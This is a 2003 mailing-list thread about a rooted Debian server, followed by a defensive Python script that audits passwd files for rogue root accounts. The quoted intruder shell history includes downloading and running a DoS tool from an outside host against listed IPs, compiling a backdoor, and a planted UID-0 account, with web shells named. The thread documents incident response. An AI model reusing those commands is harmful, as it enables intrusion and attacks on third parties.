Back up /etc and any other data you have, and you can reference your configuration files later during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking you can 'recover' from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again maybe you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your existing configuration files (though I would NOT use them as-is without inspection, since they could potentially have backdoor'd the configs as well).

Good luck.

Josh

Markus Schabel ([EMAIL PROTECTED]) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <[EMAIL PROTECTED]> wrote:
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaulted.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >curious.
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
> >it's the daily cronjob that stole.
>
> yes, and that's reproducible :(
>
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >i'm thinking about a hardware problem.
> >maybe the harddrive is in failure (get the output of dmesg) or a very big
> >ram problem that corrupts files on the hard drive.
>
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
>
> but nothing about the disks
>
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
>
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
>
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
>
> in /etc/.rpn there's a .bash_history with the following content:
>
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
>
> and the executable dos
>
> interesting is the line "tar --help" :D
>
> in "last" I see the following:
>
> >slacks pts/0 Sun Sep 14 02:26 - 03:37 (01:11)
> >200-147-107-35.tlm.dialuol.com.br
>
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
>
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files:
> backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
>
> so we got hacked :(
>
> what information should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
>
> thanks
> Markus
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
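As an added example (not code from this thread or from anyone in it): a small Python audit that checks a passwd file for the two indicators Markus reported, an extra UID-0 account and a home directory hidden under a dot-named path such as /etc/.rpn. It is the kind of check to run against a copy of the compromised disk mounted read-only in another box, as Laurent suggests, before the reinstall. The sample passwd content is constructed; only the `slacks` line is taken from the message. The function names `parse_passwd`, `hidden_home`, `audit_passwd` and `audit_file` are this example's own.

```python
"""Added example: audit passwd(5) entries for the indicators reported in the
thread (an extra UID-0 account, a home directory hidden under a dot-name).
Not code from the thread; the sample content below is constructed, with only
the 'slacks' line taken from Markus's message."""

# Constructed sample /etc/passwd content; the 'slacks' line is from the thread.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
markus:x:1000:1000:Markus Schabel:/home/markus:/bin/bash
slacks:x:0:0::/etc/.rpn:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd(5) text into a list of dicts; malformed lines raise ValueError."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def hidden_home(home):
    """True if any component of the home directory path starts with a dot."""
    return any(part.startswith(".") for part in home.split("/") if part)


def audit_passwd(text, allowed_uid0=("root",)):
    """Return (kind, account) findings in file order.

    kind is 'uid0' for a UID-0 account not in allowed_uid0, and
    'hidden_home' for a home directory under a dot-named path.
    """
    findings = []
    for entry in parse_passwd(text):
        if entry["uid"] == 0 and entry["name"] not in allowed_uid0:
            findings.append(("uid0", entry["name"]))
        if hidden_home(entry["home"]):
            findings.append(("hidden_home", entry["name"]))
    return findings


def audit_file(path="/etc/passwd", allowed_uid0=("root",)):
    """Run the audit on a real passwd file, e.g. one on a read-only mounted disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read(), allowed_uid0)


if __name__ == "__main__":
    for kind, account in audit_passwd(SAMPLE_PASSWD):
        print(f"{kind}: {account}")
```

Point `audit_file` at the passwd file of the mounted copy (for example `/mnt/hacked/etc/passwd`) rather than at the live system; the list of accounts allowed to hold UID 0 should be the one you know from your own configuration, not whatever the compromised file contains.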